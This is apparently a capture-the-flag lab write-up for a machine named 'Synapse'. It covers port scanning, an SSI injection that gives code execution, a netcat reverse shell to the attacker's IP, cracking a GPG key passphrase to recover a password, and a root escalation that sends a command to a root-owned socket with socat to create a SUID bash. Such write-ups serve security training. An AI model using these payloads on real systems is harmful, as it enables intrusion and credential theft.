Synapse
Gaining Access
Nmap scan:
$ nmap -p- --min-rate 3000 -Pn 192.168.201.149
Starting Nmap 7.93 ( https://nmap.org ) at 2023-07-15 12:30 +08
Nmap scan report for 192.168.201.149
Host is up (0.17s latency).
Not shown: 65530 closed tcp ports (conn-refused)
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
80/tcp open http
139/tcp open netbios-ssn
445/tcp open microsoft-ds
SMB + FTP Rabbit Holes
FTP doesn't accept anonymous logins, and SMB with no credentials doesn't show us any share that we can access:
$ smbmap -H 192.168.201.149
[+] IP: 192.168.201.149:445 Name: 192.168.201.149
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (Samba 4.9.5-Debian)
It is thus likely that there's a web exploit, so we can start proxying traffic through Burpsuite.
Web Enum -> SSI Injection
Port 80 was running a custom dashboard:

The File Manager was running elFinder, but we cannot access it since we need administrative access:

I checked the user tab, and found that the user was called mindsflee
:

All of options were under construction, except for the one on the right most.

From my enumeration, this seems to be the most vulnerable point. I attempted to upload some PHP webshells, but it seems only images are allowed.

There was one weird part, which was the url=inspect.shtml
portion, since I had never seen that before. Searching for shtml
gives us results for Server Side Includes (SSI).

Hacktricks has done a page on SSI Injection that we could try.
We can try some of the payloads:

If we follow the redirect, we get this:

We now have RCE on the machine, and we can easily get a reverse shell using this:
<!--#exec cmd='nc -c bash 192.168.45.189 21' ->

Privilege Escalation
GPG Creds -> Mindsflee Shell
Within the /home/mindsflee
directory, there are some files of interest:
www-data@synapse:/home/mindsflee$ ls -la
total 32
drwxr-xr-x 3 mindsflee mindsflee 4096 Jun 10 2021 .
drwxr-xr-x 3 root root 4096 Jun 10 2021 ..
lrwxrwxrwx 1 root root 9 Jun 10 2021 .bash_history -> /dev/null
-rw-r--r-- 1 mindsflee mindsflee 220 Jun 10 2021 .bash_logout
-rw-r--r-- 1 mindsflee mindsflee 3526 Jun 10 2021 .bashrc
drwxr-xr-x 2 root root 4096 Jun 14 2021 .gnupg
-rw-r--r-- 1 mindsflee mindsflee 807 Jun 10 2021 .profile
-rw-r--r-- 1 mindsflee mindsflee 33 Jul 15 00:29 local.txt
-rw-r--r-- 1 root root 2058 Jan 3 2021 synapse_commander.py
www-data@synapse:/home/mindsflee/.gnupg$ ls -la
total 20
drwxr-xr-x 2 root root 4096 Jun 14 2021 .
drwxr-xr-x 3 mindsflee mindsflee 4096 Jun 10 2021 ..
-rw-r--r-- 1 mindsflee mindsflee 5180 Jun 14 2021 creds.priv
-rw-r--r-- 1 mindsflee mindsflee 124 Jun 14 2021 creds.txt.gpg
The .gnupg
file contains some creds. Download these files back to our machine, and we can then try to decrypt it. Using gpg
, we can attempt to import this key but it requires a passphrase.
We can crack this using gpg2john
and john
:
$ gpg2john creds.priv > gpg_hash
$ john --show gpg_hash
mindsflee:qwertyuiop:::mindsflee::creds.priv
Using this, we can then import the key using gpg
and decrypt the file:
$ gpg --import creds.priv
gpg: key 8ECE3C203E92BE79: "mindsflee" not changed
gpg: key 8ECE3C203E92BE79: secret key imported
gpg: Total number processed: 1
gpg: unchanged: 1
gpg: secret keys read: 1
gpg: secret keys unchanged: 1
$ gpg --output decrypted --decrypt creds.txt.gpg
gpg: AES256.CFB encrypted data
gpg: encrypted with 1 passphrase
$ cat decrypted
user: mindsflee
password: m1ndsfl33w1llc4tchy0u?
Using this password, we can su
to mindsflee
.

Sudo Privileges -> Socket Injection
The mindsflee
user can use sudo
with the Python script we found:
[sudo] password for mindsflee:
Matching Defaults entries for mindsflee on synapse:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User mindsflee may run the following commands on synapse:
(root) /usr/bin/python /home/mindsflee/synapse_commander.py
Here's the content of the script:
import socket
import os, os.path, sys
import time
from collections import deque
print("""\
_____ __ __ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ _____ ____ _____ _____
| __| | | | | _ | _ | __| __| | | | | | _ | | | \| __| __ |
|__ |_ _| | | | | __|__ | __| | --| | | | | | | | | | | | | | | __| -|
|_____| |_| |_|___|__|__|__| |_____|_____| |_____|_____|_|_|_|_|_|_|__|__|_|___|____/|_____|__|__|
""")
print("Focus your approach with a system designed for single network port access.")
print ("With Synapse Commander, a single arm delivers three multi-jointed instruments")
print("and a fully wristed 3DHD camera for visibility and control in narrow surgical spaces.")
print("Streamlined setup, multiple control modes and a dynamic statistics display are included")
print
print("1 - Access to ARM management")
print("2 - Enable 3DHD camera")
print("3 - Settings")
print("4 - Reboot the system")
print
instruction = raw_input("Synapse Instruction:")
if instruction == "1":
print ("\nARM MANAGEMENT ENABLED")
os.system("touch 2343432445467676")
elif instruction == "2":
print ("\n3DHD CAMERA ENABLED")
os.system("touch 5344225453244546")
elif instruction == "3":
print ("\nACCESS TO SETTINGS CONFIGURATION")
os.system("touch 77756563456244546")
elif instruction == "4":
print ("\nSYSTEM REBOOTED")
os.execl(sys.executable, sys.executable, *sys.argv)
else:
os.execl(sys.executable, sys.executable, *sys.argv)
if os.path.exists("/tmp/synapse_commander.s"):
os.remove("/tmp/synapse_commander.s")
server = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
server.bind("/tmp/synapse_commander.s")
os.system("chmod o+w /tmp/synapse_commander.s")
while True:
server.listen(1)
conn, addr = server.accept()
datagram = conn.recv(1024)
if datagram:
print(datagram)
os.system(datagram)
conn.close()
This program seems to open a Socket as root
using the configuration of synapse_commander.s
after we input any number from 1-3, since option 4 and all others would just re-run the script.
Again, Hacktricks has a page for this:
In one SSH session, run the Python script and input '1'. In another SSH session, run this command:
echo "cp /bin/bash /tmp/bash; chmod +s /tmp/bash; chmod +x /tmp/bash;" | socat - UNIX-CLIENT:/tmp/synapse_commander.s
When we enter that command, the script starts waiting for data to be sent in, which it passes to os.system(datagram)
. This would result in RCE as root
:

We can then easily get a root
shell:

Last updated